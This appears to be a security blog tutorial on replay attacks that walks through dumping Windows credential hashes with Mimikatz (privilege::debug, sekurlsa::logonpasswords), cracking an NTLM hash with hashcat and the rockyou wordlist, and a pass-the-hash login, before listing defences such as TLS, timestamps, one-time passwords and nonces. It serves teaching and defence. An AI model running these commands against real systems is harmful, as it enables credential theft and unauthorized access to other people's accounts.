electrical device with play and pause button
Sun Mar 05

Replay attack and Hashes Dumping with Mimikatz

You are logging in to a website, providing a username and password and checklisting the remember me option to enter your dashboard. You have followed the best practice for your password such as using a strong and unique password with a combination of uppercase, lowercase, number and special character. You also change the password regularly and avoid using any personal information. After certain periods of time, you have your account hacked and you have no idea how it could happen. This is the scenario when the replay attack could happen.

What is a replay attack?

A replay attack is a security attack in which an attacker intercepts and captures data that is transmitted between two parties, and then uses that data to gain unauthorized access to a system or service at a later time. This type of attack can take advantage of the sensitive information such as session or cookies that are stored in the web browser. In a system, the data can be stored as a hash that contains the user credential information.

This information is then used to deceive the targeted service or system into thinking that the attacker is a legitimate user attempting to log in, allowing the actor to gain unauthorized access. The attacker may gain access to the user account to the user dashboard without having to know the actual user’s password or gaining certain user privilege.

Examples of replay attack

As the title said, we are going to simulate how the replay attack works by practicing it with Mimikatz. With Mimikatz, we can dump the hashes from the Windows machine which are stored as the hashes in the memory.

Back then, Windows relied on NTLM for authentication, confidentiality, and integrity. It relies on the password hashing mechanism. While it is still supported by Windows, it is now replaced by Kerberos. In fact, we can push it further with the Golden Ticket Attack using the same tool. This kind of attack targets the network protected with Kerberos and tries to gain access to the entire network with almost limitless access.

But for now, we are going to limit the scope so you know how this hash can be used to trace back to the actual password. We can also use the hash right away without cracking it to gain access to a particular user account with the pass- the-hash attack which is a well-known instance of a replay attack.

For educational purposes only, we suggest using Kali or any Linux distribution that you are comfortable with. It is important that you practice it on your own system, and please note that we cannot be held responsible for any wrongdoing or illegal activity that may result from your use of this information.

Running Mimikatz

At first, you need Mimikatz running on the target PC. You can start accessing the target PC by connecting to a Windows machine via SSH. After that, you have to run mimikatz.exe on that computer and run it with the following command.

C:/Users/Administrator>mimikatz.exe

Ensuring to run with Administrator privilege

Mimikatz requires Administrator privilege. Hence, you need to run the following command and check the result. Also make sure that the command returns Privilege ’20’ OK. Otherwise, it won’t be running properly.

mimikatz # privilege::debug
Privilege ‘20’ OK

Dumping the hashes

To dump the hashes, use the following command.

mimikatz # sekurlsa::logonpasswords

This command will dump out all passwords in the system. You can then search for a user name and focus on some values including username, domain, and NTLM value. Here is an example.


	msv :
 	 [00000003] Primary
 	 Username : Bob
	 Domain : XYZ
 	 NTLM   : a9fdfa038c4b75ebc76dc855dd74f0da

Cracking the hash with hashcat

You need a hashcat tool to crack the hash. You can go back to your Linux system. Assuming you are using Kali, you probably need to first extract the wordlist we are going to use with the following command.

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

After that you can run the hashcat and get the actual password. However, this process is going to be resource intensive.

hashcat -m 1000 <hash> usr/share/wordlists/rockyou.txt

Using pass-the-hash technique

Alternatively, you can use pass-the-hash technique to gain access to a user account by using the following command.

mimikatz # sekurlsa::pth /user:Bob /domain:xyz.local /ntlm:a9fdfa038c4b75ebc76dc855dd74f0da

Using this, you don’t have to crack the password, instead use the hash for authentication. The new command prompt will then show up and you can switch into it. Check whether you have successfully gained access with this command.

whoami

How to prevent replay attacks?

As you know now that the other information besides your actual credential can be used to gain access over your account, it is essential to take extra precautions when it comes to securing your accounts. There are several known ways to effectively prevent the replay attack from happening.

Encryption

While the above case only portrays the Windows system that stores the user credential in the form of hash, the online communication that involves client and server might use the session ID instead.

Session ID refers to the piece of data that is used as session identity of the current message exchange. Session is common in client-server communication, where the server will maintain the session with a particular user. The server will send the session ID with the requestor (client) and maintain the currently opening session.

Unfortunately, this Session ID is known to be able to be hijacked by the attacker as the client will store this data inside the browser. By utilizing techniques like request forgery, the attacker might be able to pose as a client and communicate to the server without requiring the actual user credential.

This is why encryption such as SSL and TLS plays a critical role in protecting the communication. The attacker will be unaware of where the session ID is as they will receive a nonsensical message as a result of the encryption.

Time stamping

Timestamp messages can be included in the actual request to the server. This is what the Kerberos protocol does with the ticket granting authorization, where the ticket is only valid within a certain period of time, limiting the effectiveness of replay attack.

One time password

Using OTP can be very effective in preventing the occurrence of replay attacks. The server will pass the OTP to the client and the client needs to respond back to the server with the given OTP which is only valid once.

Nonce-based authentication

Servers can also use randomly generated characters known as nonce everytime they are communicating with the client. Nonce makes a request unique, thereby preventing attackers from executing a malicious replay attack or communicating with the server, even with a valid server response during a man-in-the-middle attack.

Conclusion

Replay attacks may present a significant threat to security, as they can deceive the system with reused valid data, potentially resulting in severe consequences. Even seemingly convenient features like “remember me” can have serious security drawbacks. Therefore, it is critical to mitigate the risk of replay attacks through the implementation of encryption and other preventative measures.

You might like

NFTables Tutorial with Example

Learn how to use nftables, the successor of iptables, to filter network packets on Linux. Discover the benefits, concepts, and syntax of nftables with examples. Start using nftables today and improve your network security and performance. Read more now!
SSTI: How to Secure Your Web Templates from Code Injection Attacks

Learn what server-side template injection (SSTI) is, how it works, what impact it can have, how to prevent and detect it, and why it is important to know about it.